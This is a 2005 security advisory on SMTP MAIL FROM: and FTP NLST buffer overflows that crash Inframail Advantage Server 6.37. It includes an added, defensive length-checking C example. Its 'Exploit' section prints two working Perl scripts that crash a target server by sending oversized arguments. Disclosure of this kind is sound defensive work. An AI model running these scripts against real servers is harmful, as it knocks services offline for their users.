Thursday, June 30, 2005

[NEWS] Infradig Systems Inframail Advantage Server Multiple DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Infradig Systems Inframail Advantage Server Multiple DoS
------------------------------------------------------------------------

SUMMARY

Infradig servers (http://www.infradig.com/) are "servers that support
SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
mailing-lists, calendars and document sharing".

Lack of proper command filtering allows an attacker to send a long string
as a command argument, causing a buffer overflow that crashes the
Infradig server.

DETAILS

Vulnerable Systems:
* Infradig Systems Advantage Server Edition version 6.37

Immune Systems:
* Infradig Systems Advantage Server Edition version 7.2

The SMTP MAIL FROM: and FTP NLST commands are vulnerable to buffer overflow.
Sending the character 'A' 40960 times as the argument to the MAIL FROM:
command causes the ifmail.exe process to die and re-launch.

Sending the character 'A' roughly 102400 times as the argument to the NLST
command, and then sending the same NLST command a second time, causes all
processes running under the ifmailsvc.exe process to die and re-launch
(these processes include slapd.exe, slurpd.exe, ifmail.exe, ifweb.exe and
others).

Vendor Status:
The vendor has released a patch for Infradig Systems Advantage Server
Edition.
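
The following is an added example, not part of the original advisory and not Inframail code: a command-line reader in C that checks length before copying, so an oversized MAIL FROM: argument like the one described above is refused instead of overflowing a buffer. The names read_command and check_mail_from and the sample input are constructed for illustration; the 512-octet limit is the SMTP command-line maximum from RFC 5321, and applying a similar cap to FTP commands such as NLST is an assumption.

```c
#include <string.h>

#define MAX_LINE 512 /* RFC 5321 sec. 4.5.3.1.4: SMTP command line incl. CRLF */
enum line_status { LINE_OK, LINE_INCOMPLETE, LINE_TOO_LONG };

/* Hypothetical helper, not Inframail code: copy one LF-terminated command
 * from in[0..in_len) into out as a NUL-terminated string. Length is checked
 * before any copy; *consumed is how many input bytes the caller discards. */
enum line_status read_command(const char *in, size_t in_len,
                              char *out, size_t out_cap, size_t *consumed)
{
    const char *nl = memchr(in, '\n', in_len);
    size_t n;
    if (nl == NULL) { /* no terminator yet: wait only while under the limit */
        *consumed = (in_len >= MAX_LINE) ? in_len : 0;
        return (in_len >= MAX_LINE) ? LINE_TOO_LONG : LINE_INCOMPLETE;
    }
    n = (size_t)(nl - in) + 1;       /* line length including LF */
    *consumed = n;
    if (n > MAX_LINE)
        return LINE_TOO_LONG;        /* caller replies "500" and keeps running */
    n--;                             /* drop LF */
    if (n > 0 && in[n - 1] == '\r')
        n--;                         /* drop CR */
    if (n >= out_cap)
        return LINE_TOO_LONG;        /* would not fit together with the NUL */
    memcpy(out, in, n);
    out[n] = '\0';
    return LINE_OK;
}

/* Constructed input: "MAIL FROM:" + arg_len 'A' bytes + CRLF. */
enum line_status check_mail_from(size_t arg_len)
{
    static char in[65536];
    char cmd[MAX_LINE];
    size_t used;
    if (arg_len > sizeof in - 12) arg_len = sizeof in - 12; /* keep sample in bounds */
    memcpy(in, "MAIL FROM:", 10);
    memset(in + 10, 'A', arg_len);
    memcpy(in + 10 + arg_len, "\r\n", 2);
    return read_command(in, arg_len + 12, cmd, sizeof cmd, &used);
}

int main(void)
{
    return check_mail_from(40960) == LINE_TOO_LONG ? 0 : 1;
}
```

A server using this pattern would answer an oversized line with an SMTP 500 reply and discard the consumed bytes, rather than passing the argument to a fixed-size buffer.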

Exploit:
Inframail_SMTPOverflow.pl
#===== Start Inframail_SMTPOverflow.pl =====
#
# Usage: Inframail_SMTPOverflow.pl <ip>
# Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";

sleep(1);

print $socket "HELO moto.com\r\n";

sleep(1);

print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}

# EOF

Inframail_FTPOverflow.pl
#
# Usage: Inframail_FTPOverflow.pl <ip>
# Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";

sleep(1);

print $socket "USER hello\r\n";

sleep(1);

print $socket "PASS moto\r\n";

sleep(1);

print $socket "NLST " . "A" x 102400 . "\r\n";

sleep(1);

print $socket "NLST " . "A" x 102400 . "\r\n";

close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}

#EOF

ADDITIONAL INFORMATION

The information has been provided by Reed Arvin (reedarvin@gmail.com).


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
